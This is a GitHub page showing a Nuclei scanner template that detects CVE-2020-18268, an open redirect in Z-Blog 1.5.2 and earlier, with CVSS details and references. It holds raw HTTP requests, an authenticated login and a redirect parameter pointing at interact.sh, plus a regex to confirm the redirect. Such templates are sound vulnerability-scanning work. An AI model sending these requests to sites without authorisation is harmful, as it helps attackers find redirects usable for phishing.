-
Notifications
You must be signed in to change notification settings - Fork 3.4k
Expand file tree
/
Copy pathCVE-2020-18268.yaml
More file actions
50 lines (46 loc) · 2.06 KB
/
CVE-2020-18268.yaml
File metadata and controls
50 lines (46 loc) · 2.06 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
id: CVE-2020-18268
info:
name: Z-Blog <=1.5.2 - Open Redirect
author: 0x_Akoko
severity: medium
description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.
remediation: |
Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability.
reference:
- https://github.com/zblogcn/zblogphp/issues/216
- https://github.com/zblogcn/zblogphp/issues/209
- https://nvd.nist.gov/vuln/detail/CVE-2020-18268
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-18268
cwe-id: CWE-601
epss-score: 0.06993
epss-percentile: 0.91024
cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: zblogcn
product: z-blogphp
tags: cve,cve2020,redirect,zblogphp,authenticated,zblogcn,vuln
http:
- raw:
- |
POST /zb_system/cmd.php?act=verify HTTP/1.1
Host: {{Hostname}}
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
Connection: close
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- |
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/1.1
Host: {{Hostname}}
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a00473045022061c1fb267ce4c354009d092ddbb9f9d6d7b20daa1206517db60060da4ef9a279022100c788cd0004028224513a95288f51240a849da764525d3d06c74e372e4ba73fe4:922c64590222798bb761d5b6d8e72950